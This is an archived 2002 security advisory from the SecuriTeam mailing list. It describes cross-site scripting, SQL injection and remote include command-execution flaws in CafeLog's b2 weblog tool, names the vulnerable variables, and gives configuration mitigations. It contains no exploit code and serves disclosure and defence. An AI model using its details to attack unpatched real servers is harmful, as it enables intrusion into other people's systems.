[NEWS] Multiple Vulnerabilities in CafeLog Weblog Package

From: support@securiteam.com
Date: 08/18/02

From: support@securiteam.com
To: list@securiteam.com
Date: Sun, 18 Aug 2002 10:53:51 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Multiple Vulnerabilities in CafeLog Weblog Package


The <http://cafelog.com/> CafeLog Weblog contains multiple
vulnerabilities, the most serious could allow malicious users to execute
commands against a web server running the vulnerable package.


Vulnerable systems:
 * CafeLog b2 Weblog Tool 2.06pre4

Numerous serious vulnerabilities exist in the "b2" Weblog tool by CafeLog.
Numerous variables are not properly initialized or sanitized, allowing for
several unsafe actions.

There are numerous cases where small bits of data being echoed back to the
browser from variables that can be remotely set by a GPC variable. This
enables a simple cross-site scripting attack.

Further, there are several cases where the "tableposts" variable is used
without proper sanitation. Further, if the machine does not have the
option "magic_quotes_gpc" enabled, an SQL injection attack can be levied
against the backend database. However, this may be hampered by reported
bugs in the PHP mysql_query() function (it only completes the first query
in a series) that prevent multiple queries from being issued.

In addition, the variable "b2inc" is used as a portion of an include file
path -- if this variable is set via GPC, commands can be executed or
arbitrary code disclosed.

There are significant mitigating factors to both the SQL injection and
command-execution vulnerabilities. The SQL injection flaw can only be
exploited if magic_quotes_gpc has been disabled. The SQL injection may be
further hampered by an issue in the PHP mysql_query() function -- it only
executes one query at a time.

Further, the command execution should be limited to the rights of the PHP
user, barring exploitation of additional vulnerabilities. On UNIX, this
should be nobody/nobody. On Windows NT/2000/XP, this may be the privileges
of the IIS Internet Web Account Manager (IWAM), equivalent to a guest
user. On other NT servers, this will be a similar low-privileged account.

Enabling magic_quotes_gpc eliminates the SQL injection and file reading

Disabling allow_fopen_url eliminates the command execution vulnerabilities

However, the cross-site scripting vulnerabilities must be eliminated by a
patch to the application.

Vendor response:
The vendor has been notified, no official response has been received.


The information has been provided by <mailto:mattmurphy@kc.rr.com>
Matthew Murphy.


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.